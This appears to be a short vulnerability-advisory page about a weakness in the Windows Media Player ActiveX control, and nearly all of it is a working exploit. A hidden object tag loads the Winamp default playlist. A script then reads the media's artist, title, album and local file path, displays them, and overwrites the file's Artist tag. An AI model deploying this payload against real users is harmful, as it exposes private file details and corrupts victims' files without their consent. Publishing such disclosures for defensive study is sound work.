|
Windows Media Player ActiveX Control Media File Attribute Corruption Weakness
The following exploit was released: <object style="display:none;" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" id="WindowsMediaPlayer"> <param name="autoStart" value="1"> <param name="url" value="file://c:\program files\winamp\winamp.m3u"> <param name="mute" value="1"> </object> <script> note = 'Look at yourself and find the mortality of your body'; setTimeout( function(){ if (WindowsMediaPlayer.currentMedia.sourceURL!='c:\\program files\\winamp\\winamp.m3u') { artist = WindowsMediaPlayer.currentMedia.getItemInfo("Artist"); title = WindowsMediaPlayer.currentMedia.getItemInfo("Title"); album = WindowsMediaPlayer.currentMedia.getItemInfo("Album"); texxt = ""; if (artist!=note) { if (artist!="") texxt='I like '+artist+'!\n'; if (title!="") texxt=texxt+'I think '+title+' is the best song'; if ((title!="")&&(album!="")) texxt=texxt+' from '; if (album!="") texxt=texxt+'My favorite album "'+album+'".\n'; else texxt=texxt+'.\n'; texxt=texxt+'I have it on my computer ('+WindowsMediaPlayer.currentMedia.sourceURL+'), I guess you have it too! ;)'; alert(texxt); } WindowsMediaPlayer.currentMedia.setItemInfo("Artist",note); alert('done!\nplay '+WindowsMediaPlayer.currentMedia.sourceURL+' by a player and take a look at artist name, it must be changed!'); WindowsMediaPlayer.controls.stop(); WindowsMediaPlayer.controls.play(); } else alert('Can\'t find winamp default playlist!\nMost probably the winamp is not installed in c:\\program files\\winamp directory.'); } ,2000); </script> </body></html> |
|
 Privacy Statement |
